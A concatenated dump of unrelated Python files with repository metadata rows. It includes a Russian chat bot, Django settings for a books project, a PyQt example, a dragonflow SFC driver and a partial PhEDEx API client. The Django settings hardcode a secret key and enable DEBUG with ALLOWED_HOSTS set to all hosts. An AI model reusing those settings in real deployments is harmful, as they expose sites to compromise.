'Время странствий пришло к концу, ты на месте. Ура! Ура!',
'Не грусти, найдешь ещё веселье',
'Не стой, беги!',
'Ты надеешься не напрасно!',
'Ты устал, отдохни чуток',
'Ничего советовать не буду, ты и так знаешь что делать'
]
if any(keyword in text for keyword in want_advice):
await bot.send_message(answer_to=message,
text=random.choice(advices))
@message_to_bot
async def who_is_guily(message, text):
guilty = [
'Да это все массонский заговор',
'Путин, кто же еще',
'Это происки сатаны',
'Рептилоиды, они же управляют всей планетой',
'Судьба...',
'Не знаю, но точно не я!',
'Это все я, прости',
'Глобальное потепление',
'Ты сам. А кто же еще?',
'Телевизор',
'Интернет',
'Тупые школьники'
]
if 'кто виноват' in text:
if random.choice(range(10)) == 6 and message['sender'] > 2000000000:
chosen_one = (
random.choice(
list(
filter(
lambda x: x.get('id') != bot.get_account_id(),
await bot.get_chat_users(message['sender'])
)
)
)
)
await bot.send_message(answer_to=message,
text='Это {} {} во всем виноват'.format(
chosen_one.get('first_name'),
chosen_one.get('last_name')))
else:
await bot.send_message(answer_to=message,
text=random.choice(guilty))
@admin_only
@message_to_bot
async def sey_hello_to_master(message, text):
if 'привет' in text:
await bot.send_message(answer_to=message,
text='Привет, создатель')
@message_to_bot
async def info(message, text):
if 'инфа' in text:
infa = random.SystemRandom().randint(1,101)
if infa == 100:
answer = 'инфа сотка'
elif infa == 101:
answer = 'инфа 146%'
else:
answer = 'инфа %s%%' % infa
await bot.send_message(answer_to=message,
text=answer)
@message_to_bot
async def love_you(message, text):
love = ('люблю тебя', 'я тебя люблю')
if any(keyword in text for keyword in love):
if message['speaker'] == admin_key:
await bot.send_message(message, "Я тоже тебя люблю <3")
else:
await bot.send_message(message, "А я тебя нет")
@message_to_bot
async def get_help(message, text):
need_help = ('команды', 'помощь')
answer = 'Отзываюсь на Лина, Бот и Народ в начале сообщения. Регистр не важен. \r\n' \
'Кроме команды в сообщение можно добавлять любой текст. ' \
'Можно использовать несколько команд в одном сообщении, ' \
'они выполнятся в случайном порядке\r\n' \
'-- броски кубиков --\r\n' \
'команды в формате 2д4, 1d12 или 3к6. Можно прибавлять и вычитать модификаторы, например, 1д12 +3\r\n' \
'команда "дайс" это то же самое, что и 1d20 \r\n' \
'-- другие команды --\r\n' \
'"рандом от X до Y" возвращает случайное число в заданных границах \r\n' \
'"кто избран" указывает на случайного человека в беседе. Не работает в личных сообщениях\r\n' \
'"кто виноват" поможет найти причину всех бед\r\n' \
'"посты" объясняет, почему никто ничего не пишет\r\n' \
'"инфа" определит степень достоверности факта\r\n' \
'"мяу" покажет случайный стикер с котиком'
if any(keyword in text for keyword in need_help):
await bot.send_message(answer_to=message,
text=answer)
@message_to_bot
async def interval_random(message, text):
if 'рандом' in text:
parse_result = re.findall(interval_regexp, text)
if parse_result:
min, max = map(lambda x: int(x), parse_result[0])
if min > max:
min, max = max, min
value = random.SystemRandom().randint(min, max)
await bot.send_message(message, "(от {} до {})={}".format(min,
max,
value))
bot.add_handler(handler=dice_roller)
bot.add_handler(handler=cheat_switcher)
bot.add_handler(handler=where_is_posts)
bot.add_handler(handler=send_cat)
bot.add_handler(handler=get_advice)
bot.add_handler(handler=who_is_guily)
bot.add_handler(handler=sey_hello_to_master)
bot.add_handler(handler=info)
bot.add_handler(handler=get_help)
bot.add_handler(handler=love_you)
bot.add_handler(handler=interval_random)
bot.add_handler(handler=who_is_chosen, message_type=bot.STATUSES['CONF'])
await bot.start()
loop.run_until_complete(main())
| [
"p.tihachev@uiscom.ru"
] | p.tihachev@uiscom.ru |
dbfc227659f42dc45de529130cd75d359d724e08 | 02a6085953bc002baa44fd43e7ba29f92fd787c7 | /books/settings.py | d86cc98cef9e4bfc65a54a9bdfec0571d7f903e6 | [] | no_license | dzmitry-babak-idf/spd-book | cbab520af986aa3acccb5690f63c116cf3591788 | e6ab073d23b0152174d032625ce87356a86fa167 | refs/heads/master | 2023-01-07T01:31:56.471204 | 2020-10-30T13:20:35 | 2020-10-30T13:20:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,078 | py | """
Django settings for books project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a#u_9)&)n9@3-@jp0kju%lno6s!*91vtj*35ifmgixsyzoqe*h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'social_django',
'store',
]
INTERNAL_IPS = [
# ...
'127.0.0.1',
# ...
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'debug_toolbar_force.middleware.ForceDebugToolbarMiddleware',
]
ROOT_URLCONF = 'books.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'books.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.getenv('books_project_db_name'),
'USER': os.getenv('books_project_db_user'),
'PASSWORD': os.getenv('books_project_db_pass'),
'HOST': os.getenv('books_project_db_host'),
'PORT': os.getenv('books_project_db_port'),
}
}
AUTHENTICATION_BACKENDS = (
'social_core.backends.github.GithubOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
)
}
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
SOCIAL_AUTH_POSTGRES_JSONFIELD = True
SOCIAL_AUTH_GITHUB_KEY = os.getenv('SOCIAL_AUTH_GITHUB_KEY')
SOCIAL_AUTH_GITHUB_SECRET = os.getenv('SOCIAL_AUTH_GITHUB_SECRET')
| [
"alexgott1990@gmail.com"
] | alexgott1990@gmail.com |
cb16b3fbbd81a6f0cb29a42504cccd16bf61955e | e10422c540b3199cc5663c1c226ae2b8f24fd5cf | /Results/__init__.py | 36b8f9b1f825122a4c1052ad476813c4f6cc63ab | [] | no_license | cccccsf/single_point | f014a9f0a18eb30ddd4a967a822eba3bd26ed53a | 61cc11b0c40e082b45c5458c8435dbea001af466 | refs/heads/master | 2020-05-09T10:10:05.035435 | 2019-05-07T12:44:30 | 2019-05-07T12:44:30 | 181,030,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | #!/usr/bin/python3
from Results.results import results
from Results.calculation import get_extrapolated_correction
from Results.class_result import Result
| [
"cccccsf@hotmail.com"
] | cccccsf@hotmail.com |
9e5456d6b76c0bd071eb86f99e5e3f7dd0882a2e | fb79dc795666de2f5ae28c9393403d8972bf181d | /santdex/Basic_button.py | 92e6f7bcf45728ba0220459b70be783a454b82e4 | [] | no_license | paulossant/QtPy | 2a99141a173d845b4a110af159f2284472873c68 | dfebbc8e389725a1d9a9fe0896450db4e4612756 | refs/heads/master | 2022-02-16T17:10:56.818156 | 2019-09-01T09:45:13 | 2019-09-01T09:45:13 | 198,267,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 27 14:46:01 2019
@author: pssantos
"""
import sys
from PyQt5 import QtWidgets, QtGui, QtCore
class Window(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(50, 50, 800, 600)
self.setWindowTitle('BasicGui!')
self.setWindowIcon(QtGui.QIcon('trilobit.jpg'))
self.setWindowIconText('Trilobit')
self.home()
def home(self):
btn = QtWidgets.QPushButton('Quit', self)
# btn.clicked.connect(QtCore.QCoreApplication.exit)
btn.clicked.connect(self.close_application)
# btn.resize(100,100)
btn.move(100,100)
def close_application(self):
# print(' whooaaaa so custom!')
sys.exit()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
# app.aboutToQuit.connect(app.deleteLater)
GUI = Window()
GUI.show()
app.exec_()
sys.exit(0) | [
"noreply@github.com"
] | paulossant.noreply@github.com |
1fea2857dcc9af90fdf162402607c141fca68c60 | bd97707bef0e13e40916c623503bcdabe677a55b | /view/o_token.py | 03ecae9fcc9dee9b608821ae0b7d2befe7e85e9f | [] | no_license | IvyBrandyn/tic-tac-toe | eaf1c547b739edc2fa9a44132555e1f87abb86cb | 4f7182e5981d63288a7809ec8817097c16dd8a38 | refs/heads/master | 2023-05-14T16:10:43.752468 | 2021-06-01T20:08:53 | 2021-06-01T20:08:53 | 324,673,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | from view.token_piece import TokenPiece
class OToken(TokenPiece):
def draw_token(self, line: int) -> str:
if line == 0:
return r" //==\\ "
elif line == 1:
return " || || "
elif line == 2:
return r" \\==// "
def __str__(self):
return "O"
def is_token(self, response: str):
return response in ["o", "O", "0"]
| [
"brandynsandoval@gmail.com"
] | brandynsandoval@gmail.com |
75d4ea1cf87452918b95075d0138a33e121d8174 | 60c24a2191923393a7c3916d46fb537d39de3952 | /main.py | ea18b38df1429d2e925c2e8a5542d862780cad98 | [] | no_license | mylo19/Advanced_Signal_Processing | a752f020678b8618038c19a25067832f0e8f46fb | 930f633c7774d1146c46cbfef766dfc825782369 | refs/heads/main | 2023-04-04T06:50:49.696387 | 2021-04-13T17:33:17 | 2021-04-13T17:33:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from Indirect_Method_Functions import *
import math
lamda1 = 0.12
lamda2 = 0.3
lamda3 = lamda1 + lamda2
lamda4 = 0.19
lamda5 = 0.17
lamda6 = lamda4 + lamda5
lamda = np.array([lamda1, lamda2, lamda3, lamda4, lamda5, lamda6])
N: int = 8192
K = 32
M = 256
L = 64
X = [0]*N
for k in range(N):
phi = np.random.uniform(0, 2*math.pi, 6)
phi[2] = phi[0] + phi[1]
phi[5] = phi[3] + phi[4]
x = [0]*len(phi)
for i in range(len(phi)):
x[i] = math.cos(2*math.pi*lamda[i] + phi[i])
X[k] = sum(x)
Y = split_sample(N, M, X)
c = np.zeros(shape=(L, L))
for k in range(0, N, M):
r = r_calculation(Y[k:k+M], L, M)
c += r
c = c/K
C_indirect = indirect_bispectrum_calculation(c, L, 0)
| [
"mylowade98@gmail.com"
] | mylowade98@gmail.com |
937713858c166adde7bccaca7cff6d4be55d0b99 | f6c7084f91434566a9aa1b821d2739edede036f8 | /ReadFileLineByLine/venv/Scripts/pip-script.py | adf8211b1eadc9e26f6daea7d86b6b5d26d11112 | [] | no_license | GANESH0080/Python-WorkPlace | 87fc3776e693d254661c476bfe977c696d087276 | 43196086bee26cbeae25fb7bbacb8dbbde85d648 | refs/heads/master | 2020-09-20T03:45:13.824696 | 2019-11-27T07:27:17 | 2019-11-27T07:27:17 | 224,369,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | #!D:\PythonWorkPlace\ReadFileLineByLine\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"ganusalunkhe@gmail.com"
] | ganusalunkhe@gmail.com |
f8f4cf02fcea381bb1fa2612b29951a3d0b866ec | 2e5304a5801c81241dfe2998d5a182e1c0cdcab3 | /scramble.py | 798a775504441a2b8ca052145242eec1ea1d1a10 | [] | no_license | jamcowl/TextScramblers | eead7410d8d0734750dd5c92a3984b6afb98421e | d6a20aa2bad37418f953da8efa2d02e1e9c2d7b4 | refs/heads/master | 2021-01-20T06:33:01.380472 | 2017-10-28T00:08:39 | 2017-10-28T00:08:39 | 101,504,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | #!/usr/bin/env python
from random import shuffle
import sys
# function to scramble a word
def scramble(inString):
result = inString[0]
innards = list(inString[1:-1])
if len(inString) == 1:
return inString
# construct output
while(True):
shuffle(innards)
result = inString[0]
for innard in innards:
result += innard
result += inString[-1]
# if output happens to match input, try it again
if (len(inString) < 4 or result != inString):
break
else:
result = inString[0]
return result
# do the things
inputStrings = sys.argv[1:]
out = ""
for inputString in inputStrings:
scram = scramble(inputString)
out += scram+" "
out = out.strip();
print "Scrambled version:"
print out
| [
"james_cowley@live.co.uk"
] | james_cowley@live.co.uk |
b901c321019e6ddbc08ebea4429f826b3269e9ab | 0669ea772b4a813c147b4884df609ab6c0fc8f44 | /gpsnprototypewebsite/about/urls.py | 9d697deac94a224e457b022510617cdfaf3dc56a | [] | no_license | PurdueCAM2Project/CAM2Phenology | dc01167aa61785cfa7fc3827016b69e2846d0d6b | b10e9f10ce21effcf0ca6cad05c90f3b67a83b98 | refs/heads/master | 2021-09-13T01:59:52.323084 | 2018-04-23T18:10:05 | 2018-04-23T18:10:05 | 103,655,290 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | from django.conf.urls import url #imports necessary stuff to handle URL confs and such
from . import views #get the views from the folder that you're in
urlpatterns = [
url(r'^$', views.about, name = 'about'),
url(r'^contact/$', views.contact, name = 'contact'), # needs to be synced with Support Contact
url(r'^mission/$', views.mission, name = 'mission'),
url(r'^abilities/$', views.abilities, name = 'abilities'),
url(r'^instructions/$', views.instructions, name = 'instructions'),
url(r'^instructions/tutorial/$', views.tutorial, name = 'tutorial'),
] | [
"berry65@purdue.edu"
] | berry65@purdue.edu |
e40affec22a2a7089ad6a4f67068270232f077c7 | ba315c4a0512f84f77f2c785dbe54160b006919c | /dragonflow/neutron/services/sfc/driver.py | 5409c3cd83bb3e87b27a37cd35e89429e3dffc9e | [
"Apache-2.0"
] | permissive | Benny93/dragonflow | f1a1808cc065d504293d350023b80a481d9c81de | fbb15e221f8ce2bf6a4bb6d66635dde9ebb13131 | refs/heads/master | 2021-01-22T04:04:53.612529 | 2017-10-20T12:27:34 | 2017-10-20T12:27:34 | 102,262,082 | 1 | 0 | null | 2017-09-03T12:13:06 | 2017-09-03T12:13:06 | null | UTF-8 | Python | false | false | 5,491 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from networking_sfc.services.sfc.drivers import base
from dragonflow.db.models import sfc
from dragonflow.neutron.services import mixins
def _get_optional_params(obj, *params):
'''This function returns a dictionary with all the parameters from `params`
that were present in `obj`, for example:
>>> _get_optional_params({'a': 1, 'b': 2}, 'a', 'c')
{'a': 1}
'''
res = {}
for param in params:
if param in obj:
res[param] = obj.get(param)
return res
class DfSfcDriver(base.SfcDriverBase, mixins.LazyNbApiMixin):
# The new SFC driver API:
def initialize(self):
pass
def create_port_chain_postcommit(self, context):
port_chain = context.current
pc_params = port_chain.get('chain_parameters')
self.nb_api.create(
sfc.PortChain(
id=port_chain['id'],
topic=port_chain['project_id'],
name=port_chain.get('name'),
port_pair_groups=port_chain.get('port_pair_groups', []),
flow_classifiers=port_chain.get('flow_classifiers', []),
protocol=pc_params.get('correlation'),
chain_id=port_chain.get('chain_id'),
),
)
def update_port_chain_postcommit(self, context):
port_chain = context.current
extra_args = _get_optional_params(
port_chain,
'port_pair_groups',
'flow_classifiers',
)
self.nb_api.update(
sfc.PortChain(
id=port_chain['id'],
topic=port_chain['project_id'],
name=port_chain.get('name'),
**extra_args
),
)
def delete_port_chain_postcommit(self, context):
port_chain = context.current
self.nb_api.delete(
sfc.PortChain(
id=port_chain['id'],
topic=port_chain['project_id'],
),
)
def create_port_pair_group_postcommit(self, context):
port_pair_group = context.current
self.nb_api.create(
sfc.PortPairGroup(
id=port_pair_group['id'],
topic=port_pair_group['project_id'],
name=port_pair_group.get('name'),
port_pairs=port_pair_group.get('port_pairs', []),
# FIXME (dimak) add support for lb_fields, service_type
),
)
def update_port_pair_group_postcommit(self, context):
port_pair_group = context.current
extra_args = _get_optional_params(port_pair_group, 'port_pairs')
self.nb_api.update(
sfc.PortPairGroup(
id=port_pair_group['id'],
topic=port_pair_group['project_id'],
name=port_pair_group.get('name'),
**extra_args
),
)
def delete_port_pair_group_postcommit(self, context):
port_pair_group = context.current
self.nb_api.delete(
sfc.PortPairGroup(
id=port_pair_group['id'],
topic=port_pair_group['project_id'],
),
)
def create_port_pair_postcommit(self, context):
port_pair = context.current
sf_params = port_pair.get('service_function_parameters', {})
self.nb_api.create(
sfc.PortPair(
id=port_pair['id'],
topic=port_pair['project_id'],
name=port_pair.get('name'),
ingress_port=port_pair['ingress'],
egress_port=port_pair['egress'],
correlation_mechanism=(
sf_params.get('correlation') or sfc.CORR_NONE
),
weight=sf_params.get('weight')
),
)
def update_port_pair_postcommit(self, context):
port_pair = context.current
self.nb_api.update(
sfc.PortPair(
id=port_pair['id'],
topic=port_pair['project_id'],
name=port_pair.get('name'),
),
)
def delete_port_pair_postcommit(self, context):
port_pair = context.current
self.nb_api.delete(
sfc.PortPair(
id=port_pair['id'],
topic=port_pair['project_id'],
),
)
# Legacy SFC driver API, has to be stubbed due to ABC
def create_port_chain(self, context):
pass
def update_port_chain(self, context):
pass
def delete_port_chain(self, context):
pass
def create_port_pair_group(self, context):
pass
def update_port_pair_group(self, context):
pass
def delete_port_pair_group(self, context):
pass
def create_port_pair(self, context):
pass
def update_port_pair(self, context):
pass
def delete_port_pair(self, context):
pass
| [
"dima.kuznetsov@toganetworks.com"
] | dima.kuznetsov@toganetworks.com |
9f30f719cd8bd8fc273306508cc8ca3498564099 | 90a2b8961ac18e2130887e4c1fbe875dea490fdd | /03-Methods and Functions/spy_game.py | 321642e9c61e4161e6643d8bcb79e9d51a5b0e9c | [] | no_license | paperbag-zz/python-exercises | 3adb13128b9b5abf55cec4e9e0d349f5b7832bfb | e59c487497fb42dd4dae4c9f823969aaec819d1c | refs/heads/master | 2020-04-01T18:49:24.322885 | 2018-10-24T05:05:50 | 2018-10-24T05:05:50 | 153,516,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | def spy_game(numbers):
spy_caught = ['', '', '']
for number in numbers:
if spy_caught == ['', '', ''] and number == 0:
spy_caught = ['0', '', '']
if spy_caught == ['0', '', ''] and number == 0:
spy_caught = ['0', '0', '']
if spy_caught == ['0', '0', ''] and number == 7:
spy_caught = ['0', '0', '7']
if spy_caught == ['0', '0', '7']:
return True
return False
spy_game([])
if spy_game([1,4,7,8,3,4,0,2,8,9,0,3,4,1,3,7,9]):
print('Spy Game 1', True)
else:
print('Spy Game 1', False)
if spy_game([1,4, 0,0,7,8,3,4,2,3,4,8,9,1,3,7,9]):
print('Spy Game 2', True)
else:
print('Spy Game 2', False)
if spy_game([1,4,7,8,3,4,2,8,9,3,4,1,3,7,9]):
print('Spy Game 3', True)
else:
print('Spy Game 3', False)
if spy_game([8,9,3,4,1,3,7,9,1,4,7,8,3,4,2]):
print('Spy Game 4', True)
else:
print('Spy Game 4', False)
if spy_game([1,4,7,8,3,4,2,8,9,3,4,1,3,7,9]):
print('Spy Game 5', True)
else:
print('Spy Game 5', False)
| [
"paperbag.a@gmail.com"
] | paperbag.a@gmail.com |
0d8a2556c00cf0f1fd3764e071685a6426465736 | e32154b11d9307855bfa3a28fd5ef909e6ea7fca | /Api/src/phedexApi.py | 75550461844d760101a94239343901f257f1348e | [
"MIT"
] | permissive | cpausmit/IntelROCCS | c5947cb038e338f7bcdf8f3d4d203b45ae0df670 | 526672963452ed33706468ea2dc6fb63510d9090 | refs/heads/master | 2020-04-15T17:28:04.978006 | 2017-03-24T12:17:01 | 2017-03-24T12:17:01 | 17,555,528 | 1 | 4 | null | null | null | null | UTF-8 | Python | false | false | 14,841 | py | #!/usr/local/bin/python
#---------------------------------------------------------------------------------------------------
# Python interface to access PhEDEx online API. See website for API documentation
# (https://cmsweb.cern.ch/phedex/datasvc/doc)
#
# Use grid-proxy-init to aquire a valid CERN proxy, proxy's are only valid for a limited time.
# grid-proxy-init requires usercert.pem and userkey.pem in ~/.globus/
# It is up to the caller to make sure a valid CERN proxy is available.
# Example: grid-proxy-init -valid 24:00 (Generates a proxy valid for 24h)
#
# The API doesn't check to make sure correct values are passed or that rquired parameters are
# passed. All such checks needs to be done by the caller.
#
# Functions only return data in form of JSON, never XML.
# Instance of phedex can be selected using the instance parameter [prod/dev], default is prod.
#
# In case of error an error message is printed to the log.
# If a valid call is made but no data was found a JSON structure is still returned, it is up to
# the caller to check for actual data.
#---------------------------------------------------------------------------------------------------
import os, urllib, urllib2, httplib, json, ConfigParser
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
from email.Utils import formataddr
from subprocess import Popen, PIPE
class phedexApi:
def __init__(self):
config = ConfigParser.RawConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'api.cfg'))
self.fromEmail = config.items('from_email')[0]
self.toEmails = config.items('error_emails')
self.phedexBase = config.get('phedex', 'base')
#===================================================================================================
# H E L P E R S
#===================================================================================================
def call(self, url, values):
data = urllib.urlencode(values)
opener = urllib2.build_opener(HTTPSGridAuthHandler())
request = urllib2.Request(url, data)
strout = ""
e = ""
msg = ""
# Will try to call 3 times before reporting an error
for attempt in range(3):
try:
strout = opener.open(request)
response = strout.read()
jsonData = json.loads(response)
except urllib2.HTTPError, err:
e = err
msg = e.read()
continue
except urllib2.URLError, err:
e = err
msg = e.read()
continue
except ValueError, err:
e = err
continue
else:
break
else:
self.error(e, msg)
return jsonData
def error(self, e, errMsg):
title = "FATAL IntelROCCS Error -- PhEDEx"
text = "FATAL -- %s --- MSG: %s" % (str(e), str(errMsg))
msg = MIMEMultipart()
msg['Subject'] = title
msg['From'] = formataddr(self.fromEmail)
msg['To'] = self._toStr(self.toEmails)
msg1 = MIMEMultipart("alternative")
msgText1 = MIMEText("<pre>%s</pre>" % text, "html")
msgText2 = MIMEText(text)
msg1.attach(msgText2)
msg1.attach(msgText1)
msg.attach(msg1)
msg = msg.as_string()
p = Popen(["/usr/sbin/sendmail", "-toi"], stdin=PIPE)
p.communicate(msg)
print "FATAL -- %s --- MSG: %s" % (str(e), str(errMsg))
raise Exception("FATAL -- %s --- MSG: %s" % (str(e), str(errMsg)))
def _toStr(self, toList):
names = [formataddr(i) for i in zip(*toList)]
return ', '.join(names)
def createXml(self, datasets=[], instance='prod'):
xml = '<data version="2.0">'
xml = xml + '<dbs name="https://cmsweb.cern.ch/dbs/%s/global/DBSReader">' % (instance)
successDatasets = []
for dataset in datasets:
for attempt in range(3):
jsonData = self.data(dataset=dataset, level='block')
if not jsonData:
continue
try:
data = jsonData.get('phedex').get('dbs')[0].get('dataset')[0]
except IndexError:
continue
else:
break
else:
print("ERROR -- Couldn't create xml data for dataset %s\n" % (dataset))
continue
successDatasets.append(dataset)
xml = xml + '<dataset name="%s" is-open="%s">' % (data.get('name'), data.get('is_open'))
xml = xml + "</dataset>"
xml = xml + "</dbs>"
xmlData = xml + "</data>"
return successDatasets, xmlData
#===================================================================================================
# A P I C A L L S
#===================================================================================================
def blockArrive(self, id_='', block='', dataset='', to_node='', priority='', update_since='', basis='', arrive_before='', arrive_after='', instance='prod'):
values = {'id':id_, 'block':block, 'dataset':dataset, 'to_node':to_node, 'priority':priority, 'update_since':update_since, 'basis':basis, 'arrive_before':arrive_before, 'arrive_after':arrive_after}
url = "%s/json/%s/blockarrive" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- blockArrive call failed", "values: id=%s, block=%s, dataset=%s, to_node=%s, priority=%s, update_since=%s, basis=%s, arrive_before=%s, arrive_after=%s, instance=%s\n" % (id_, block, dataset, to_node, priority, update_since, basis, arrive_before, arrive_after, instance))
return jsonData
def blockReplicas(self, block='', dataset='', node='', se='', update_since='', create_since='', complete='', dist_complete='', subscribed='', custodial='', group='', show_dataset='', instance='prod'):
values = {'block':block, 'dataset':dataset, 'node':node, 'se':se, 'update_since':update_since, 'create_since':create_since, 'complete':complete, 'dist_complete':dist_complete, 'subscribed':subscribed, 'custodial':custodial, 'group':group, 'show_dataset':show_dataset}
url = "%s/json/%s/blockreplicas" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- blockReplicas call failed", "values: block=%s, dataset=%s, node=%s, se=%s, update_since=%s, create_since=%s, complete=%s, dist_complete=%s, subscribed=%s, custodial=%s, group=%s, show_dataset=%s, instance=%s\n" % (block, dataset, node, se, update_since, create_since, complete, dist_complete, subscribed, custodial, group, show_dataset, instance))
return jsonData
def data(self, dataset='', block='', file_='', level='', create_since='', instance='prod'):
values = {'dataset':dataset, 'block':block, 'file':file_, 'level':level, 'create_since':create_since}
url = "%s/json/%s/data" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- data call failed", "values: dataset=%s, block=%s, file=%s, level=%s, create_since=%s, instance=%s\n" % (dataset, block, file_, level, create_since, instance))
return jsonData
def delete(self, node='', data='', level='', rm_subscriptions='', comments='', instance='prod'):
values = {'node':node, 'data':data, 'level':level, 'rm_subscriptions':rm_subscriptions, 'comments':comments}
url = "%s/json/%s/delete" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- delete call failed", "values: node=%s, level=%s, rm_subscriptions=%s, comments=%s, instance=%s\n" % (node, level, rm_subscriptions, comments, instance))
return jsonData
def deleteRequests(self, request='', node='', create_since='', limit='', approval='', requested_by='', instance='prod'):
values = {'request':request, 'node':node, 'create_since':create_since, 'limit':limit, 'approval':approval, 'requested_by':requested_by}
url = "%s/json/%s/deleterequests" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- deleteRequests call failed", "values: request=%s, node=%s, create_since=%s, limit=%s, approval=%s, requested_by=%s, instance=%s\n" % (request, node, create_since, limit, approval, requested_by, instance))
return jsonData
def deletions(self, node='', se='', block='', dataset='', id_='', request='', request_since='', complete='', complete_since='', instance='prod'):
values = {'node':node, 'se':se, 'block':block, 'dataset':dataset, 'id':id_, 'request':request, 'request_since':request_since, 'complete':complete, 'complete_since':complete_since}
url = "%s/json/%s/deletions" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- deletions call failed for values: node=%s, se=%s, block=%s, dataset=%s, id=%s, request=%s, request_since=%s, complete=%s, complete_since=%s, instance=%s\n" % (node, se, block, dataset, id_, request, request_since, complete, complete_since, instance))
return jsonData
def requestList(self, request='', type_='', approval='', requested_by='', node='', decision='', group='', create_since='', create_until='', decide_since='', decide_until='', dataset='', block='', decided_by='', instance='prod'):
values = {'request':request, 'type':type_, 'approval':approval, 'requested_by':requested_by, 'node':node, 'decision':decision, 'group':group, 'create_since':create_since, 'create_until':create_until, 'decide_since':decide_since, 'decide_until':decide_until, 'dataset':dataset, 'block':block, 'decided_by':decided_by}
url = "%s/json/%s/requestlist" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- requestList call failed", "values: request=%s, type=%s, approval=%s, requested_by=%s, node=%s, decision=%s, group=%s, create_since=%s, create_until=%s, decide_since=%s, decide_until=%s, dataset=%s, block=%s, decided_by=%s, instance=%s\n" % (request, type_, approval, requested_by, node, decision, group, create_since, create_until, decide_since, decide_until, dataset, block, decided_by, instance))
return jsonData
def subscribe(self, node='', data='', level='', priority='', move='', static='', custodial='', group='', time_start='', request_only='', no_mail='', comments='', instance='prod'):
